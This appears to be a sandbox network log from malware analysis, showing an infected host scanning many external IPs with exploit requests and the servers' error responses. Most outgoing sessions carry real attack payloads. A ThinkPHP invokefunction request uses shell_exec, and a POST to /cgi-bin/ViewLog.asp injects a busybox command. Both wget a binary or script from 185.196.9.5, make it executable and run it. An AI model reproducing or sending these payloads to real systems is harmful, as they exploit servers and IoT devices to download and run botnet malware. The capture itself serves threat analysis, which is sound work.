Feb 25, 2024 19:05:41.737169981 CET	411	IN	HTTP/1.1 404 Not Found Date: Sun, 25 Feb 2024 18:05:40 GMT Server: Webs X-Frame-Options: SAMEORIGIN Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1272	192.168.2.15	53296	95.179.214.192	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:41.671452045 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:41.840280056 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:05:41 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1273	192.168.2.15	48514	95.128.101.142	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:41.675122023 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:41.850151062 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:05:41 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1274	192.168.2.15	34374	95.130.22.77	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:41.857956886 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:42.044783115 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:05:41 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1275	192.168.2.15	52386	88.99.226.116	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:41.865128994 CET	181	IN	HTTP/1.0 400 Bad request cache-control: no-cache content-type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1276	192.168.2.15	45838	95.216.17.248	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:41.866090059 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:42.061052084 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.20.1 Date: Sun, 25 Feb 2024 18:05:41 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1277	192.168.2.15	35590	95.213.154.225	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:41.875797987 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:42.080769062 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.20.1 Date: Sun, 25 Feb 2024 18:05:41 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1278	192.168.2.15	54288	95.101.66.60	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:41.875807047 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:42.079891920 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:05:41 GMT Date: Sun, 25 Feb 2024 18:05:41 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 63 65 36 36 35 35 66 26 23 34 36 3b 31 37 30 38 38 38 34 33 34 31 26 23 34 36 3b 32 35 36 35 31 36 32 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.ace6655f.1708884341.2565162b</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1279	192.168.2.15	38636	95.179.198.14	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:41.895838976 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:42.062000990 CET	59	IN	HTTP/1.1 400 Bad Request Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
1280	192.168.2.15	41692	31.136.59.103	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:41.910566092 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:42.468540907 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:43.556484938 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:45.956561089 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1281	192.168.2.15	40826	85.208.121.53	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:41.954657078 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:42.176862955 CET	1286	IN	HTTP/1.0 400 Bad Request Server: squid/3.1.23 Mime-Version: 1.0 Date: Sun, 25 Feb 2024 17:35:59 GMT Content-Type: text/html Content-Length: 3167 X-Squid-Error: ERR_INVALID_URL 0 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area /#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/ initial title /#titles h1 {color: #000000;}#titles h2 {color: #000000;}/ special event: FTP success page titles /#titles ftpsuccess {background-color:#00ff00;width:100%;}/ Page displayed body content area */#content {padding: 10px;background: #ffffff

Session ID	Source IP	Source Port	Destination IP	Destination Port
1282	192.168.2.15	54682	94.121.70.189	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:41.965847015 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1283	192.168.2.15	54608	94.123.136.85	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:42.121577024 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1284	192.168.2.15	40848	31.200.107.28	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:42.125698090 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1285	192.168.2.15	35976	31.136.119.145	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:42.725167036 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:45.956561089 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1286	192.168.2.15	48212	62.20.248.2	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:42.922303915 CET	538	IN	HTTP/1.0 400 Bad Request Server: uhttpd/1.0.0 Date: Sun, 25 Feb 2024 18:05:42 GMT Content-Type: text/html; charset="UTF-8" Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 4c 49 4e 4b 20 72 65 6c 3d 20 73 74 79 6c 65 73 68 65 65 74 20 68 72 65 66 3d 20 2f 66 6f 72 6d 2e 63 73 73 3e 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 63 6f 6e 74 65 6e 74 2d 74 79 70 65 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 3e 3c 53 54 59 4c 45 20 74 79 70 65 3d 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3e 63 6c 61 73 73 65 73 2e 6e 75 6d 2e 61 6c 6c 2e 66 6f 6e 74 46 61 6d 69 6c 79 20 3d 20 43 6f 75 72 69 65 72 3b 20 63 6c 61 73 73 65 73 2e 6e 75 6d 2e 61 6c 6c 2e 66 6f 6e 74 53 69 7a 65 20 3d 20 31 30 70 74 3b 3c 2f 53 54 59 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 46 65 6c 61 6b 74 69 67 20 62 65 67 c3 a4 72 61 6e 3c 2f 48 31 3e 0a 44 65 6e 20 68 c3 a4 72 20 73 65 72 76 65 72 6e 20 73 74 c3 b6 64 6a 65 72 20 69 6e 74 65 20 64 